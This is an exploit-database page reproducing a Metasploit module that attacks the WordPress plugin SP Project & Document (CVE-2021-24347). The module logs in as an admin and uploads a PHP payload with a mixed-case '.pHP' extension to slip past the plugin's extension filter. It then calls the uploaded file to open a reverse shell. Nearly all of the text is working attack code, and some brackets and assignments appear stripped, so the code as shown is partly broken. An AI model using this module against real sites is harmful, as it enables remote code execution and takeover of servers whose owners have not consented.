Looking for a fix? Check your Codebase security with multiple scanners from

Edit Report

Our sensors found this exploit at:

Below is a copy:

WordPress SP Project And Document Remote Code Execution
# This module requires Metasploit:
# Current source:
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Exploit::FileDropper

  def initialize(info = {})
        'Name' => 'Wordpress Plugin SP Project and Document - Authenticated Remote Code Execution',
        'Description' => %q{
          This module allows an attacker with a privileged Wordpress account to launch a reverse shell
          due to an arbitrary file upload vulnerability in Wordpress plugin SP Project & Document < 4.22.
          The security check only searches for lowercase file extensions such as `.php`, making it possible to upload `.pHP` files for instance.
          Finally, the uploaded payload can be triggered by a call to `/wp-content/uploads/sp-client-document-manager/<user_id>/<random_payload_name>.php`
        'License' => MSF_LICENSE,
        'Author' =>
            'Ron Jost', # Exploit-db
            'Yann Castel (yann.castel[at]' # Metasploit module
        'References' =>
            ['EDB', '50115'],
            ['CVE', '2021-24347']
        'Platform' => ['php'],
        'Arch' => ARCH_PHP,
        'Targets' =>
          ['Wordpress SP Project & Document < 4.22', {}]
        'Privileged' => false,
        'DisclosureDate' => '2021-06-14',
        'Notes' =>
            'Stability' => [CRASH_SAFE],
            'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
            'Reliability' => [REPEATABLE_SESSION]

    register_options ['USERNAME', [true, 'Username of the admin account', 'admin']),'PASSWORD', [true, 'Password of the admin account', 'admin']),'TARGETURI', [true, 'The base path of the Wordpress server', '/'])

  def check
    return CheckCode::Unknown('Server not online or not detected as wordpress') unless wordpress_and_online?

    cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])
    if cookie
      check_plugin_version_from_readme('sp-client-document-manager', '4.22')
      CheckCode::Detected('The admin credentials given are wrong !')

  def get_user_id(cookie)
    r = send_request_cgi({
      'method' => 'GET',
      'cookie' => cookie,
      'uri' => normalize_uri(target_uri.path, 'wp-admin/admin.php'),
      'Referer' => full_uri('/wp-admin/users.php'),
      'vars_get' => {
        'page' => 'sp-client-document-manager-fileview'
    fail_with(Failure::Unknown, "Target #{RHOST} could not be reached.") unless r
    user_id = r.body.to_s.match(%r{<option value='(\d+)'>#{datastore['USERNAME']}</option>})
    fail_with(Failure::UnexpectedReply, "Can't find user id on plugin page") unless user_id && user_id[1]

  def exploit
    cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])
    fail_with(Failure::NoAccess, 'Authentication failed') unless cookie
    user_id = get_user_id(cookie)
    payload_name = "#{Rex::Text.rand_text_alpha_lower(5)}.pHP"
    post_data =
    post_data.add_part(Rex::Text.rand_text_alpha(5..8), nil, nil, "form-data; name='cdm_upload_file_field'")
    post_data.add_part("/wordpress/wp-admin/admin.php?page=sp-client-document-manager-fileview&id=#{user_id}", nil, nil, "form-data; name='_wp_http_referer'")
    post_data.add_part('exploits', nil, nil, "form-data; name='dlg-upload-name'")
    post_data.add_part('', 'application/octet-stream', nil, "form-data; name='dlg-upload-file[]'; filename=''")
    post_data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name='dlg-upload-file[]'; filename='#{payload_name}'")
    post_data.add_part('', nil, nil, "form-data; name='dlg-upload-notes'")
    post_data.add_part('Upload', nil, nil, "form-data; name='sp-cdm-community-upload'")

    print_status("Uploading file \'#{payload_name}\' containing the payload...")

    r = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'wp-admin/admin.php'),
      'headers' => {
        'Origin' => full_uri(''),
        'Referer' => full_uri('wp-admin/admin.php')
      'vars_get' => {
        'page' => 'sp-client-document-manager-fileview',
        'id' => user_id
      'cookie' => cookie,
      'data' => post_data.to_s,
      'ctype' => "multipart/form-data; boundary=#{post_data.bound}"

    fail_with(Failure::UnexpectedReply, "Wasn't able to upload the payload file") unless r&.code == 302

    print_status('Triggering the payload ...')

      'method' => 'GET',
      'cookie' => cookie,
      'uri' => normalize_uri(target_uri.path, "/wp-content/uploads/sp-client-document-manager/#{user_id}/#{payload_name.downcase}")

Copyright ©2022 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.